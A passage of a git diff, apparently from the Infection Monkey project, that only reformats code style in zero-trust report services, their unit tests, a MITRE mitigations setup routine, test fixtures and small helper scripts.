"status": PrincipleService.__get_lcd_worst_status_for_test(test_findings) + "test": zero_trust_consts.TESTS_MAP[test][ + zero_trust_consts.TEST_EXPLANATION_KEY + ], + "status": PrincipleService.__get_lcd_worst_status_for_test(test_findings), } ) return results @@ -60,8 +62,9 @@ class PrincipleService: """ current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) \ - < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index( + finding.status + ) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py index 917678ed8..51677efc9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py @@ -1,54 +1,79 @@ from common.common_consts import zero_trust_consts -from monkey_island.cc.services.zero_trust.test_common.finding_data import get_monkey_finding_dto, \ - get_scoutsuite_finding_dto +from monkey_island.cc.services.zero_trust.test_common.finding_data import ( + get_monkey_finding_dto, + get_scoutsuite_finding_dto, +) def save_example_findings(): # devices passed = 1 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_PASSED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, + zero_trust_consts.STATUS_PASSED, + ) # devices passed = 2 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_PASSED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, + zero_trust_consts.STATUS_PASSED, + ) # devices failed = 1 - _save_finding_with_status('monkey', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED + ) # people verify = 1 # networks verify = 1 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCHEDULED_EXECUTION, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "scoutsuite", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY + ) # people verify = 2 # networks verify = 2 - _save_finding_with_status('monkey', zero_trust_consts.TEST_SCHEDULED_EXECUTION, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY + ) # data failed 1 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED + ) # data failed 2 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, + zero_trust_consts.STATUS_FAILED, + ) # data failed 3 - 
-    _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
-                              zero_trust_consts.STATUS_FAILED)
+    _save_finding_with_status(
+        "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
+    )
     # data failed 4
-    _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
-                              zero_trust_consts.STATUS_FAILED)
+    _save_finding_with_status(
+        "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
+    )
     # data failed 5
-    _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
-                              zero_trust_consts.STATUS_FAILED)
+    _save_finding_with_status(
+        "scoutsuite",
+        zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
+        zero_trust_consts.STATUS_FAILED,
+    )
     # data verify 1
-    _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
-                              zero_trust_consts.STATUS_VERIFY)
+    _save_finding_with_status(
+        "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
+    )
     # data verify 2
-    _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
-                              zero_trust_consts.STATUS_VERIFY)
+    _save_finding_with_status(
+        "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
+    )
     # data passed 1
-    _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
-                              zero_trust_consts.STATUS_PASSED)
+    _save_finding_with_status(
+        "scoutsuite",
+        zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
+        zero_trust_consts.STATUS_PASSED,
+    )
 def _save_finding_with_status(finding_type: str, test: str, status: str):
-    if finding_type == 'scoutsuite':
+    if finding_type == "scoutsuite":
         finding = get_scoutsuite_finding_dto()
     else:
         finding = get_monkey_finding_dto()
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
index 9d832e106..67bdbc308 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
@@ -2,12 +2,26 @@ from unittest.mock import MagicMock
 import pytest
-from common.common_consts.zero_trust_consts import TESTS_MAP, TEST_SCOUTSUITE_SERVICE_SECURITY, STATUS_FAILED, \
-    DEVICES, NETWORKS, STATUS_PASSED, TEST_ENDPOINT_SECURITY_EXISTS
-from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService
-from monkey_island.cc.services.zero_trust.test_common.finding_data import get_scoutsuite_finding_dto, \
-    get_monkey_finding_dto
-from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import FindingService, EnrichedFinding
+from common.common_consts.zero_trust_consts import (
+    TESTS_MAP,
+    TEST_SCOUTSUITE_SERVICE_SECURITY,
+    STATUS_FAILED,
+    DEVICES,
+    NETWORKS,
+    STATUS_PASSED,
+    TEST_ENDPOINT_SECURITY_EXISTS,
+)
+from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import (
+    MonkeyZTDetailsService,
+)
+from monkey_island.cc.services.zero_trust.test_common.finding_data import (
+    get_scoutsuite_finding_dto,
+    get_monkey_finding_dto,
+)
+from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import (
+    FindingService,
+    EnrichedFinding,
+)
 from monkey_island.cc.test_common.fixtures.fixture_enum import FixtureEnum
@@ -21,21 +35,25 @@ def test_get_all_findings():
     findings = FindingService.get_all_findings_for_ui()
-    description = TESTS_MAP[TEST_SCOUTSUITE_SERVICE_SECURITY]['finding_explanation'][STATUS_FAILED]
-    expected_finding0 = EnrichedFinding(finding_id=findings[0].finding_id,
-                                        pillars=[DEVICES, NETWORKS],
-                                        status=STATUS_FAILED,
-                                        test=description,
-                                        test_key=TEST_SCOUTSUITE_SERVICE_SECURITY,
-                                        details=None)
+    description = TESTS_MAP[TEST_SCOUTSUITE_SERVICE_SECURITY]["finding_explanation"][STATUS_FAILED]
+    expected_finding0 = EnrichedFinding(
+        finding_id=findings[0].finding_id,
+        pillars=[DEVICES, NETWORKS],
+        status=STATUS_FAILED,
+        test=description,
+        test_key=TEST_SCOUTSUITE_SERVICE_SECURITY,
+        details=None,
+    )
-    description = TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS]['finding_explanation'][STATUS_PASSED]
-    expected_finding1 = EnrichedFinding(finding_id=findings[1].finding_id,
-                                        pillars=[DEVICES],
-                                        status=STATUS_PASSED,
-                                        test=description,
-                                        test_key=TEST_ENDPOINT_SECURITY_EXISTS,
-                                        details=None)
+    description = TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS]["finding_explanation"][STATUS_PASSED]
+    expected_finding1 = EnrichedFinding(
+        finding_id=findings[1].finding_id,
+        pillars=[DEVICES],
+        status=STATUS_PASSED,
+        test=description,
+        test_key=TEST_ENDPOINT_SECURITY_EXISTS,
+        details=None,
+    )
     # Don't test details
     details = []
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
index bf2bbe1a5..32dbaadc9 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
@@ -3,11 +3,19 @@ from typing import List
 import pytest
 from common.common_consts import zero_trust_consts
-from common.common_consts.zero_trust_consts import DATA, PEOPLE, NETWORKS, WORKLOADS, VISIBILITY_ANALYTICS, \
-    AUTOMATION_ORCHESTRATION, DEVICES
+from common.common_consts.zero_trust_consts import (
+    DATA,
+    PEOPLE,
+    NETWORKS,
+    WORKLOADS,
+    VISIBILITY_ANALYTICS,
+    AUTOMATION_ORCHESTRATION,
+    DEVICES,
+)
 from monkey_island.cc.services.zero_trust.zero_trust_report.pillar_service import PillarService
-from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data import \
-    save_example_findings
+from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data import (
+    save_example_findings,
+)
 from monkey_island.cc.test_common.fixtures import FixtureEnum
@@ -27,7 +35,7 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 1,
             # 2 different tests of DATA pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DATA) - 2,
-            "pillar": "Data"
+            "pillar": "Data",
         },
         {
             zero_trust_consts.STATUS_FAILED: 0,
@@ -35,7 +43,7 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 0,
             # 1 test of PEOPLE pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(PEOPLE) - 1,
-            "pillar": "People"
+            "pillar": "People",
         },
         {
             zero_trust_consts.STATUS_FAILED: 0,
@@ -43,7 +51,7 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 0,
             # 1 different tests of NETWORKS pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(NETWORKS) - 1,
-            "pillar": "Networks"
+            "pillar": "Networks",
         },
         {
             zero_trust_consts.STATUS_FAILED: 1,
@@ -51,7 +59,7 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 2,
             # 1 different tests of DEVICES pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DEVICES) - 1,
-            "pillar": "Devices"
+            "pillar": "Devices",
         },
         {
             zero_trust_consts.STATUS_FAILED: 0,
@@ -59,7 +67,7 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 0,
             # 0 different tests of WORKLOADS pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(WORKLOADS),
-            "pillar": "Workloads"
+            "pillar": "Workloads",
         },
         {
             zero_trust_consts.STATUS_FAILED: 0,
@@ -67,21 +75,25 @@ def _get_expected_pillar_grades() -> List[dict]:
             zero_trust_consts.STATUS_PASSED: 0,
             # 0 different tests of VISIBILITY_ANALYTICS pillar were executed in _save_findings()
             zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(VISIBILITY_ANALYTICS),
-            "pillar": "Visibility & Analytics"
+            "pillar": "Visibility & Analytics",
         },
         {
             zero_trust_consts.STATUS_FAILED: 0,
             zero_trust_consts.STATUS_VERIFY: 0,
             zero_trust_consts.STATUS_PASSED: 0,
             # 0 different tests of AUTOMATION_ORCHESTRATION pillar were executed in _save_findings()
-            zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(AUTOMATION_ORCHESTRATION),
-            "pillar": "Automation & Orchestration"
-        }
+            zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(
+                AUTOMATION_ORCHESTRATION
+            ),
+            "pillar": "Automation & Orchestration",
+        },
     ]
 def _get_cnt_of_tests_in_pillar(pillar: str):
-    tests_in_pillar = [value for (key, value) in zero_trust_consts.TESTS_MAP.items() if pillar in value['pillars']]
+    tests_in_pillar = [
+        value for (key, value) in zero_trust_consts.TESTS_MAP.items() if pillar in value["pillars"]
+    ]
     return len(tests_in_pillar)
@@ -95,7 +107,7 @@ def test_get_pillars_to_statuses():
         zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED,
         zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED,
         zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED,
-        zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED
+        zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED,
     }
     assert PillarService._get_pillars_to_statuses() == expected
@@ -108,6 +120,6 @@ def test_get_pillars_to_statuses():
         zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY,
         zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED,
         zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED,
-        zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED
+        zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED,
     }
     assert PillarService._get_pillars_to_statuses() == expected
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
index fd2502f59..23d3cd08e 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
@@ -1,90 +1,86 @@
 import pytest
 from common.common_consts import zero_trust_consts
-from monkey_island.cc.services.zero_trust.test_common.finding_data import get_monkey_finding_dto, \
-    get_scoutsuite_finding_dto
-from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import PrincipleService
+from monkey_island.cc.services.zero_trust.test_common.finding_data import (
+    get_monkey_finding_dto,
+    get_scoutsuite_finding_dto,
+)
+from
 monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import (
+    PrincipleService,
+)
 from monkey_island.cc.test_common.fixtures import FixtureEnum
 EXPECTED_DICT = {
-    'test_pillar1': [
+    "test_pillar1": [
         {
-            "principle": 'Test principle description2',
+            "principle": "Test principle description2",
             "status": zero_trust_consts.STATUS_FAILED,
             "tests": [
-                {
-                    "status": zero_trust_consts.STATUS_PASSED,
-                    "test": "You ran a test2"
-                },
-                {
-                    "status": zero_trust_consts.STATUS_FAILED,
-                    "test": "You ran a test3"
-                }
-            ]
+                {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"},
+                {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"},
+            ],
         }
     ],
-    'test_pillar2': [
+    "test_pillar2": [
        {
            "principle": "Test principle description",
            "status": zero_trust_consts.STATUS_PASSED,
-            "tests": [
-                {
-                    "status": zero_trust_consts.STATUS_PASSED,
-                    "test": "You ran a test1"
-                }
-            ]
+            "tests": [{"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test1"}],
        },
        {
            "principle": "Test principle description2",
            "status": zero_trust_consts.STATUS_FAILED,
            "tests": [
-                {
-                    "status": zero_trust_consts.STATUS_PASSED,
-                    "test": "You ran a test2"
-                },
-                {
-                    "status": zero_trust_consts.STATUS_FAILED,
-                    "test": "You ran a test3"
-                },
-            ]
-        }
-    ]
+                {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"},
+                {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"},
+            ],
+        },
+    ],
 }
 @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE)
 def test_get_principles_status():
-    TEST_PILLAR1 = 'test_pillar1'
-    TEST_PILLAR2 = 'test_pillar2'
+    TEST_PILLAR1 = "test_pillar1"
+    TEST_PILLAR2 = "test_pillar2"
     zero_trust_consts.PILLARS = (TEST_PILLAR1, TEST_PILLAR2)
-    principles_to_tests = {'network_policies': ['segmentation'],
-                           'endpoint_security': ['tunneling', 'scoutsuite_service_security']}
+    principles_to_tests = {
+        "network_policies": ["segmentation"],
+        "endpoint_security": ["tunneling", "scoutsuite_service_security"],
+    }
     zero_trust_consts.PRINCIPLES_TO_TESTS = principles_to_tests
-    principles_to_pillars = {'network_policies': {'test_pillar2'},
                             'endpoint_security': {'test_pillar1', 'test_pillar2'}}
+    principles_to_pillars = {
+        "network_policies": {"test_pillar2"},
+        "endpoint_security": {"test_pillar1", "test_pillar2"},
+    }
     zero_trust_consts.PRINCIPLES_TO_PILLARS = principles_to_pillars
-    principles = {'network_policies': 'Test principle description', 'endpoint_security': 'Test principle description2'}
+    principles = {
+        "network_policies": "Test principle description",
+        "endpoint_security": "Test principle description2",
+    }
     zero_trust_consts.PRINCIPLES = principles
-    tests_map = {'segmentation': {'explanation': 'You ran a test1'},
                 'tunneling': {'explanation': 'You ran a test2'},
                 'scoutsuite_service_security': {'explanation': 'You ran a test3'}}
+    tests_map = {
+        "segmentation": {"explanation": "You ran a test1"},
+        "tunneling": {"explanation": "You ran a test2"},
+        "scoutsuite_service_security": {"explanation": "You ran a test3"},
+    }
     zero_trust_consts.TESTS_MAP = tests_map
     monkey_finding = get_monkey_finding_dto()
-    monkey_finding.test = 'segmentation'
+    monkey_finding.test = "segmentation"
     monkey_finding.save()
     monkey_finding = get_monkey_finding_dto()
-    monkey_finding.test = 'tunneling'
+    monkey_finding.test = "tunneling"
     monkey_finding.save()
     scoutsuite_finding = get_scoutsuite_finding_dto()
-    scoutsuite_finding.test = 'scoutsuite_service_security'
+    scoutsuite_finding.test = "scoutsuite_service_security"
     scoutsuite_finding.save()
     expected = dict(EXPECTED_DICT)  # new mutable
diff --git a/monkey/monkey_island/cc/setup.py b/monkey/monkey_island/cc/setup.py
index 213a62e6b..a03c554be 100644
--- a/monkey/monkey_island/cc/setup.py
+++ b/monkey/monkey_island/cc/setup.py
@@ -19,7 +19,9 @@ def try_store_mitigations_on_mongo():
     try:
         mongo.db.validate_collection(mitigation_collection_name)
         if mongo.db.attack_mitigations.count() == 0:
-            raise errors.OperationFailure("Mitigation collection empty. Try dropping the collection and running again")
+            raise errors.OperationFailure(
+                "Mitigation collection empty. Try dropping the collection and running again"
+            )
     except errors.OperationFailure:
         try:
             mongo.db.create_collection(mitigation_collection_name)
@@ -31,12 +33,19 @@ def try_store_mitigations_on_mongo():
 
 def store_mitigations_on_mongo():
     stix2_mitigations = MitreApiInterface.get_all_mitigations()
-    mongo_mitigations = AttackMitigations.dict_from_stix2_attack_patterns(MitreApiInterface.get_all_attack_techniques())
-    mitigation_technique_relationships = MitreApiInterface.get_technique_and_mitigation_relationships()
+    mongo_mitigations = AttackMitigations.dict_from_stix2_attack_patterns(
+        MitreApiInterface.get_all_attack_techniques()
+    )
+    mitigation_technique_relationships = (
+        MitreApiInterface.get_technique_and_mitigation_relationships()
+    )
     for relationship in mitigation_technique_relationships:
-        mongo_mitigations[relationship['target_ref']].add_mitigation(stix2_mitigations[relationship['source_ref']])
+        mongo_mitigations[relationship["target_ref"]].add_mitigation(
+            stix2_mitigations[relationship["source_ref"]]
+        )
     for relationship in mitigation_technique_relationships:
-        mongo_mitigations[relationship['target_ref']].\
-            add_no_mitigations_info(stix2_mitigations[relationship['source_ref']])
+        mongo_mitigations[relationship["target_ref"]].add_no_mitigations_info(
+            stix2_mitigations[relationship["source_ref"]]
+        )
     for key, mongo_object in mongo_mitigations.items():
         mongo_object.save()
diff --git a/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py b/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py
index 17c115079..c0bc1f1aa 100644
--- a/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py
+++ b/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py
@@ -1,2 +1,2 @@
 class FixtureEnum:
-    USES_DATABASE = 'uses_database'
+    USES_DATABASE = "uses_database"
diff --git a/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py b/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py
index 8a49d0254..079c91fb7 100644
--- a/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py
+++ b/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py
@@ -6,14 +6,14 @@ from monkey_island.cc.models.edge import Edge
 from monkey_island.cc.models.zero_trust.finding import Finding
 
 
-@pytest.fixture(scope='session', autouse=True)
+@pytest.fixture(scope="session", autouse=True)
 def change_to_mongo_mock():
     # Make sure tests are working with mongomock
     mongoengine.disconnect()
-    mongoengine.connect('mongoenginetest', host='mongomock://localhost')
+    mongoengine.connect("mongoenginetest", host="mongomock://localhost")
 
 
-@pytest.fixture(scope='function')
+@pytest.fixture(scope="function")
 def uses_database():
     _clean_edge_db()
     _clean_monkey_db()
diff --git a/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py b/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py
index 64642895e..41b641cc8 100644
--- a/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py
+++ b/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py
@@ -5,8 +5,7 @@ from cProfile import Profile
 PROFILER_LOG_DIR = "./profiler_logs/"
 
 
-def profile(sort_args=['cumulative'], print_args=[100]):
-
+def profile(sort_args=["cumulative"], print_args=[100]):
     def decorator(fn):
         def inner(*args, **kwargs):
             result = None
@@ -19,11 +18,13 @@ def profile(sort_args=['cumulative'], print_args=[100]):
             except os.error:
                 pass
             filename = PROFILER_LOG_DIR + _get_filename_for_function(fn)
-            with open(filename, 'w') as stream:
+            with open(filename, "w") as stream:
                 stats = pstats.Stats(profiler, stream=stream)
                 stats.strip_dirs().sort_stats(*sort_args).print_stats(*print_args)
             return result
+
         return inner
+
     return decorator
 
 
diff --git a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
index 260d703d5..e5e7ecb5a 100644
--- a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
+++ b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
@@ -4,5 +4,5 @@ import os
 
 from PyInstaller.utils.hooks import get_module_file_attribute
 
-stix2_dir = os.path.dirname(get_module_file_attribute('stix2'))
-datas = [(stix2_dir, 'stix2')]
+stix2_dir = os.path.dirname(get_module_file_attribute("stix2"))
+datas = [(stix2_dir, "stix2")]
diff --git a/monkey/monkey_island/scripts/island_password_hasher.py b/monkey/monkey_island/scripts/island_password_hasher.py
index 61212e734..5330a322f 100644
--- a/monkey/monkey_island/scripts/island_password_hasher.py
+++ b/monkey/monkey_island/scripts/island_password_hasher.py
@@ -22,5 +22,5 @@ def main():
     print(h.hexdigest())
 
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     main()